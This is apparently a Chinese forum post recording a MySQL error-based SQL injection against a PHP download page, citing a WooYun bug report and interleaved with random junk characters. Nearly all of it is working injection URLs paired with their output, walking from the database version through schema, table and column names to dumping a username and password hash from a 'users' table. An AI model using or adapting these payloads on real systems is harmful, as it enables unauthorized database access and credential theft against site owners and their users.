php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

7 X3 `" A7 R5 H4 U/ W2 l! p# r! T% j$ V  j之前想找个测试 没想到这有 可以测试下做个记录而已

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
. z1 `. b1 s7 [1 q9 @
/data0/htdocs/leqi_new/app/myapp.php

) F# i3 c( J! o0 P4 q  q 或者
# `# _) X  j9 c6 ^6 b
) ^1 I5 ^. S( h( U1 T1 \/**********version()**********/ 5.1.49-log
5 Y& Y4 e( s9 N5 ~. _$ ], |9 Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

# W( N8 ^7 f! V3 h4 [/**********user()**********/  
' \+ j! w3 T1 H0 Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
) I, U. Z/ K- y! Ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 u) G1 g7 t+ J1 E; O3 U
0 n! R. P$ ?" f- ^. v2 s) g5 ?/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 S7 F- B" H4 R6 l" k  b9 ?# Eleqi
9 Q/ e# ]* X  d" yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, ~- F. U  i! D4 O- Ktest

$ T0 j. i# U! o2 H/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
: V& @. q' ^! @* l7 w; B( L8 c
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 [/ E3 v9 b) C8 o2 a" |user_id,username,nickname,passwd,group_id
, ~" m& z) Y' S- G- K- Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, \2 f$ S  {( d. K/wapc/5000_0005_003
2 D$ E1 q. F: o: ~- F) Z8 w* u* f2 v11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
! ]$ {+ Y, d1 E0 r8 o  P1 w7 ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
7 W5 \9 |3 j6 u$ u0 {

7 H6 g7 N# a$ n4 x5 L+ E2 W! C) _3 F